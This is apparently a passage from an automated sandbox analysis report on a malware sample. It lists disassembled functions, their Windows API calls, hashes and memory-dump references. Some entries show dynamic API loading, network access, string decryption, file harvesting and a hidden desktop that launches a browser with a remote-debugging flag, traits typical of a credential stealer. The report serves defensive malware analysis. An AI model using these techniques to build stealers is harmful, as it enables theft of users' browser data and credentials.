                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocComputerNameProcess
                                                    • String ID:
                                                    • API String ID: 4203777966-0
                                                    • Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
                                                    • Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
                                                    • Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
                                                    • Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1
                                                    Function 0092B0BE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0092B0E6
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0092B106
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0092A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_92a000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: c2f970fbd758f46679f3225cc9ca106e7e6486b23d7043dbea9be95e87f8560d
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 47F096326407216BD7213BF5BC8DB6F77ECAF49725F100528E657914C4DBB0EC458A61
                                                    Function 02480E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000400,?,?,02480223,?,?), ref: 02480E19
                                                    • SetErrorMode.KERNEL32(00000000,?,?,02480223,?,?), ref: 02480E1E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: 625e0f7f1e1b302f448508261efaf1e752b234688f5247d6a6466c6c1b929a9e
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: 85D0123215512877D7003A94DC09BDE7B1CDF05B66F008011FB0DD9180C770954046E5
                                                    Function 0041EF30 Relevance: 1.3, APIs: 1, Instructions: 50stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041EF62
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID:
                                                    • API String ID: 3722407311-0
                                                    • Opcode ID: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
                                                    • Instruction ID: d5213ce56d19ccab4b54554078f0f9591c11fd9792c964766793415fd4e25809
                                                    • Opcode Fuzzy Hash: 1b2d372935be8b3f06fb6a8661012cd35c8ed29a4714ce1eb70eff5b8d7100e8
                                                    • Instruction Fuzzy Hash: 3211E5B07201459BCB24FF7ADD4AADF37A4AF44304F404139BC88AB2E2DA78ED458795
                                                    Function 0092AD7D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0092ADCE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833922228.000000000092A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0092A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_92a000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: 888afa984b2aa1278061a109bd22c2a297c4f07702451321a55ace84fcc0369c
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: 2A113F79A00208EFDB01DF98C985E99BBF5AF08750F058094F9489B362D371EA50DF90

                                                    Non-executed Functions

                                                    Function 02497047 Relevance: 147.8, APIs: 83, Strings: 1, Instructions: 752stringmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249707C
                                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 024970AF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024970E9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497110
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249711B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497144
                                                    • lstrlen.KERNEL32(00435320), ref: 0249715E
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497180
                                                    • lstrcat.KERNEL32(00000000,00435320), ref: 0249718C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024971B7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024971E7
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0249721C
                                                    • strtok_s.MSVCRT ref: 02497249
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497284
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024972B4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlenstrtok_s
                                                    • String ID: hSC
                                                    • API String ID: 922491270-3351665975
                                                    • Opcode ID: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
                                                    • Instruction ID: c655f1bea64062c929f640680e4b2c90a35e42a4c9e131bb7a6ddb151841c1c4
                                                    • Opcode Fuzzy Hash: 74298f0b8d8d5e5808ef7b85f628bb230d045c4728235006b36d07a30008f6f0
                                                    • Instruction Fuzzy Hash: 6B42B5B0A21255ABDB21EF74CC88BAFBFB6AF44704F14541AE805E7251DBB4D901DFA0
                                                    Function 02486267 Relevance: 128.6, APIs: 68, Strings: 5, Instructions: 817stringnetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02486296
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024862E9
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248631C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248634C
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02486387
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024863BA
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 024863CA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$InternetOpen
                                                    • String ID: "$------$TPC$TPC$TPC
                                                    • API String ID: 2041821634-3953685780
                                                    • Opcode ID: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                    • Instruction ID: e8b409b156e42a220ffc92f372b55e5edf0f7c22c0fde6280f50158e4077db5d
                                                    • Opcode Fuzzy Hash: e0617bb3df533d1877c7b72e1e53e2c5cdb724f2c34b17d103d7c2aeb920e48f
                                                    • Instruction Fuzzy Hash: 83527171911256AFDB21FF75DC88EAE77BAAF44308F15442AE805EB650DB74D802CFA0
                                                    Function 00406000 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 817stringnetworkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0040602F
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$InternetOpen
                                                    • String ID: "$------
                                                    • API String ID: 2041821634-2370822465
                                                    • Opcode ID: 71a5e4ecdfd950b5bf9058453f318c0653db86c2706be46f58796bec72eee3f8
                                                    • Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
                                                    • Opcode Fuzzy Hash: 71a5e4ecdfd950b5bf9058453f318c0653db86c2706be46f58796bec72eee3f8
                                                    • Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8
                                                    Function 02497260 Relevance: 114.3, APIs: 64, Strings: 1, Instructions: 526stringmemoryencryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497284
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024972B4
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024972E4
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497316
                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02497323
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0249732A
                                                    • StrStrA.SHLWAPI(00000000,00435350), ref: 02497341
                                                    • lstrlen.KERNEL32(00000000), ref: 0249734C
                                                    • malloc.MSVCRT ref: 02497356
                                                    • strncpy.MSVCRT ref: 02497364
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249738F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024973B6
                                                    • StrStrA.SHLWAPI(00000000,00435358), ref: 024973C9
                                                    • lstrlen.KERNEL32(00000000), ref: 024973D4
                                                    • malloc.MSVCRT ref: 024973DE
                                                    • strncpy.MSVCRT ref: 024973EC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497417
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249743E
                                                    • StrStrA.SHLWAPI(00000000,00435360), ref: 02497451
                                                    • lstrlen.KERNEL32(00000000), ref: 0249745C
                                                    • malloc.MSVCRT ref: 02497466
                                                    • strncpy.MSVCRT ref: 02497474
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249749F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024974C6
                                                    • StrStrA.SHLWAPI(00000000,00435368), ref: 024974D9
                                                    • lstrlen.KERNEL32(00000000), ref: 024974E8
                                                    • malloc.MSVCRT ref: 024974F2
                                                    • strncpy.MSVCRT ref: 02497500
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497530
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02497558
                                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0249757B
                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0249758F
                                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024975B0
                                                    • LocalFree.KERNEL32(00000000), ref: 024975BB
                                                    • lstrlen.KERNEL32(?), ref: 02497655
                                                    • lstrlen.KERNEL32(?), ref: 02497668
                                                    • lstrlen.KERNEL32(?), ref: 0249767B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$mallocstrncpy$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                                    • String ID: hSC
                                                    • API String ID: 2413810636-3351665975
                                                    • Opcode ID: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
                                                    • Instruction ID: 8e26f81a12063ac0f5bdae1f1a5e528bdd186a2543b6e32817db5f417ad0c564
                                                    • Opcode Fuzzy Hash: 24ab0d83d8689fa2232d343e63a9274e2644bba371a14eb0e70f57e82b0bc6f8
                                                    • Instruction Fuzzy Hash: 6C0281B0A21255AFDB21EF74DC48AAEBFB6AF04704F14541AF805E7251DBB4D902DFA0
                                                    Function 024A6627 Relevance: 48.2, APIs: 32, Instructions: 218libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcAddress.KERNEL32(006390E0,00638DC8), ref: 024A6680
                                                    • GetProcAddress.KERNEL32(006390E0,00638E44), ref: 024A6699
                                                    • GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024A66B1
                                                    • GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024A66C9
                                                    • GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024A66E2
                                                    • GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024A66FA
                                                    • GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 024A6712
                                                    • GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 024A672B
                                                    • GetProcAddress.KERNEL32(006390E0,00638D48), ref: 024A6743
                                                    • GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 024A675B
                                                    • GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 024A6774
                                                    • GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 024A678C
                                                    • GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024A67A4
                                                    • GetProcAddress.KERNEL32(006390E0,00638D98), ref: 024A67BD
                                                    • GetProcAddress.KERNEL32(006390E0,00638A24), ref: 024A67D5
                                                    • GetProcAddress.KERNEL32(006390E0,00638C18), ref: 024A67ED
                                                    • GetProcAddress.KERNEL32(006390E0,00638E34), ref: 024A6806
                                                    • GetProcAddress.KERNEL32(006390E0,006388BC), ref: 024A681E
                                                    • GetProcAddress.KERNEL32(006390E0,0063892C), ref: 024A6836
                                                    • GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 024A684F
                                                    • LoadLibraryA.KERNEL32(00638D50,?,?,?,024A1E4A), ref: 024A6860
                                                    • LoadLibraryA.KERNEL32(0063897C,?,?,?,024A1E4A), ref: 024A6872
                                                    • LoadLibraryA.KERNEL32(00638904,?,?,?,024A1E4A), ref: 024A6884
                                                    • LoadLibraryA.KERNEL32(006389DC,?,?,?,024A1E4A), ref: 024A6895
                                                    • LoadLibraryA.KERNEL32(00638B28,?,?,?,024A1E4A), ref: 024A68A7
                                                    • GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 024A68C4
                                                    • GetProcAddress.KERNEL32(00639020,00638C24), ref: 024A68E0
                                                    • GetProcAddress.KERNEL32(00639020,006389CC), ref: 024A68F8
                                                    • GetProcAddress.KERNEL32(00639114,00638B94), ref: 024A6914
                                                    • GetProcAddress.KERNEL32(00638FD4,00638928), ref: 024A6930
                                                    • GetProcAddress.KERNEL32(00639004,00638C14), ref: 024A694C
                                                    • GetProcAddress.KERNEL32(00639004,00435864), ref: 024A6963
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2238633743-0
                                                    • Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                    • Instruction ID: d3c5e250df2fc17aceb43c6c9b629cf420937abcaa28ed06926a1dbf0a7f5447
                                                    • Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                    • Instruction Fuzzy Hash: DDA16EB9A117009FD758DF65EE88A6637BBF789744300A51EF94683360DBB4A900DFB0
                                                    Function 004097A0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 235stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 004097C4
                                                    • lstrcatA.KERNEL32(?,?), ref: 004097D8
                                                    • lstrcatA.KERNEL32(?,?), ref: 004097ED
                                                    • lstrcatA.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00409800
                                                    • memset.MSVCRT ref: 00409815
                                                      • Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
                                                      • Part of subcall function 00423E10: lstrcpy.KERNEL32(00000000,0094A758), ref: 00423E6F
                                                      • Part of subcall function 00423E10: GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79
                                                    • wsprintfA.USER32 ref: 00409846
                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00409869
                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00409888
                                                    • memset.MSVCRT ref: 004098A6
                                                    • lstrcatA.KERNEL32(?,?,?,00000000,00000103), ref: 004098BB
                                                    • lstrcatA.KERNEL32(?,?), ref: 004098CD
                                                    • lstrcatA.KERNEL32(?,00435128), ref: 004098DD
                                                    • memset.MSVCRT ref: 004098F2
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00409950
                                                    • StrStrA.SHLWAPI(?,0094E700), ref: 00409965
                                                    • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
                                                    • lstrlenA.KERNEL32(?), ref: 00409996
                                                    • wsprintfA.USER32 ref: 004099A6
                                                    • lstrcpy.KERNEL32(?,?), ref: 004099BD
                                                    • memset.MSVCRT ref: 004099D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$memset$lstrcpy$Desktopwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                    • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                                    • API String ID: 3051782728-1862457068
                                                    • Opcode ID: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
                                                    • Instruction ID: d19577a6994188075af4459c382a0e83ee01d0c412b4f1100e7ad714e1588002
                                                    • Opcode Fuzzy Hash: f6a372755e89e9bbecdb42024b4003873e3369633ad2a61d7c9caed0c3de9774
                                                    • Instruction Fuzzy Hash: 6091B5B1214340AFD720EF64DC45F9B77E9AF88704F10892DF649972D1DBB49904CBA6
                                                    Function 0249CF47 Relevance: 40.8, APIs: 27, Instructions: 310filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • wsprintfA.USER32 ref: 0249CF63
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0249CF7A
                                                    • lstrcat.KERNEL32(?,?), ref: 0249CFC6
                                                    • StrCmpCA.SHLWAPI(?,00431D70), ref: 0249CFD8
                                                    • StrCmpCA.SHLWAPI(?,00431D74), ref: 0249CFF2
                                                    • wsprintfA.USER32 ref: 0249D017
                                                    • PathMatchSpecA.SHLWAPI(?,00638D64), ref: 0249D049
                                                    • CoInitialize.OLE32(00000000), ref: 0249D055
                                                      • Part of subcall function 0249CE47: CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0249CE6D
                                                      • Part of subcall function 0249CE47: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0249CEAD
                                                      • Part of subcall function 0249CE47: lstrcpyn.KERNEL32(?,?,00000104), ref: 0249CF30
                                                    • CoUninitialize.COMBASE ref: 0249D070
                                                    • lstrcat.KERNEL32(?,?), ref: 0249D095
                                                    • lstrlen.KERNEL32(?), ref: 0249D0A2
                                                    • StrCmpCA.SHLWAPI(?,0042D01C), ref: 0249D0BC
                                                    • wsprintfA.USER32 ref: 0249D0E4
                                                    • wsprintfA.USER32 ref: 0249D103
                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0249D117
                                                    • wsprintfA.USER32 ref: 0249D13F
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0249D158
                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0249D177
                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 0249D18F
                                                    • CloseHandle.KERNEL32(00000000), ref: 0249D19A
                                                    • CloseHandle.KERNEL32(00000000), ref: 0249D1A6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0249D1BB
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249D1FB
                                                    • FindNextFileA.KERNEL32(?,?), ref: 0249D2F4
                                                    • FindClose.KERNEL32(?), ref: 0249D306
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                                    • String ID:
                                                    • API String ID: 3860919712-0
                                                    • Opcode ID: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
                                                    • Instruction ID: 2ac1a4589ba0f14eb43f8c1f9015503a6300fe3efcb3c5577d3be51cf527dd77
                                                    • Opcode Fuzzy Hash: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
                                                    • Instruction Fuzzy Hash: 6DC17571900259AFDF54EF64DC44FEE7B7AAF48304F00455AF909A7290EB749A85CFA0
                                                    Function 02481820 Relevance: 25.7, APIs: 17, Instructions: 219stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481849
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481880
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024818D3
                                                    • lstrcat.KERNEL32(00000000), ref: 024818DD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02481909
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481A5A
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02481A65
